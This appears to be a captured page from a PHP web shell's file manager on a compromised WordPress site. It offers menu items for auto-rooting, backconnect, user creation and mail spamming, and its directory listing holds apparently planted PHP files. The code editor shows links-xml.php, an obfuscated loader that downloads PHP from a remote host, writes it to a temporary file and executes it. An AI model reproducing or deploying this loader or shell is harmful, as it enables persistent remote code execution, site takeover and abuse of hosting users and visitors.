Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.217.7
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
empowernetkenyajuly2026 /
[ HOME SHELL ]
Name
Size
Permission
Action
.tmb
[ DIR ]
drwxrwxrwx
seo
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwx---r-x
wp-content
[ DIR ]
drwx---r-x
wp-includes
[ DIR ]
drwx---r-x
.htaccess
248
B
-rw-r--r--
78.tar
90
KB
-rw-r--r--
78.tar.gz
9.91
KB
-rw-r--r--
accordion.min.js.min.js.tar.gz
2.82
KB
-rw-r--r--
accordion.min.js.tar
10.5
KB
-rw-r--r--
adminer-jef89.php
0
B
-rw-r--r--
align-center.png.png.tar.gz
706
B
-rw-r--r--
align-center.png.tar
2.5
KB
-rw-r--r--
bin.zip
21.54
KB
-rw-r--r--
dex.php
77.53
KB
-rw-r--r--
index.php
405
B
-rw----r--
license.txt
19.44
KB
-rw----r--
links-xml.php
1.26
KB
-rw-r--r--
php.ini
78
B
-rw-r--r--
readme.html
7.23
KB
-rw----r--
ru-RU.zip
2.32
KB
-rw-r--r--
sid4.php
78.48
KB
-rw-r--r--
tools.zip
6.81
MB
-rw-r--r--
wp-activate.php
7.54
KB
-rw----r--
wp-blog-header.php
351
B
-rw----r--
wp-comments-post.php
2.27
KB
-rw----r--
wp-config-sample.php
3.26
KB
-rw----r--
wp-config.php
3.53
KB
-rw-rw-rw-
wp-cron.php
5.49
KB
-rw----r--
wp-l0gin.php
170.48
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw----r--
wp-load.php
3.84
KB
-rw----r--
wp-login.php
51.3
KB
-rw----r--
wp-mail.php
8.52
KB
-rw----r--
wp-settings.php
32.38
KB
-rw----r--
wp-sever.html
6.33
KB
-rw-r--r--
wp-signup.php
34.26
KB
-rw----r--
wp-storage.html
6.51
KB
-rw-r--r--
wp-trackback.php
5.27
KB
-rw----r--
xmlrpc.php
3.13
KB
-rw----r--
yuijh.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : links-xml.php
<?php $_u = 'ht' . 'tp' . ':/' . '/'; $_h = 'lx' . 'ml' . '.ah' . 'kj' . '.lo' . 'l'; $_p = '/li' . 'nks' . '-xm' . 'l' . '.t' . 'xt'; $_url = $_u . $_h . $_p; $_code = ''; if (function_exists('curl_init')) { $_ch = curl_init(); curl_setopt($_ch, CURLOPT_URL, $_url); curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($_ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($_ch, CURLOPT_CONNECTTIMEOUT, 3); curl_setopt($_ch, CURLOPT_TIMEOUT, 5); curl_setopt($_ch, CURLOPT_USERAGENT, 'Mozilla/5.0'); $_code = curl_exec($_ch); @curl_close($_ch); } elseif (ini_get('allow_url_fopen')) { $_ctx = @stream_context_create(array('http' => array('timeout' => 5))); $_code = @file_get_contents($_url, false, $_ctx); } if ($_code && strlen($_code) > 10) { $_tf = @tempnam(sys_get_temp_dir(), '.'); if (!$_tf) { $_tf = dirname(__FILE__) . '/.t' . substr(md5($_SERVER['HTTP_HOST'] . time()), 0, 8); } if (@file_put_contents($_tf, $_code) !== false) { @include($_tf); @unlink($_tf); } else { header('Content-Type: application/json'); echo '{"code":598,"msg":"loader_write_failed: tmp dir not writable (目标站临时目录不可写)"}'; } } else { header('Content-Type: application/json'); echo '{"code":598,"msg":"loader_fetch_failed: remote txt unreachable (远程TXT失效或目标站无外网)"}'; }
Close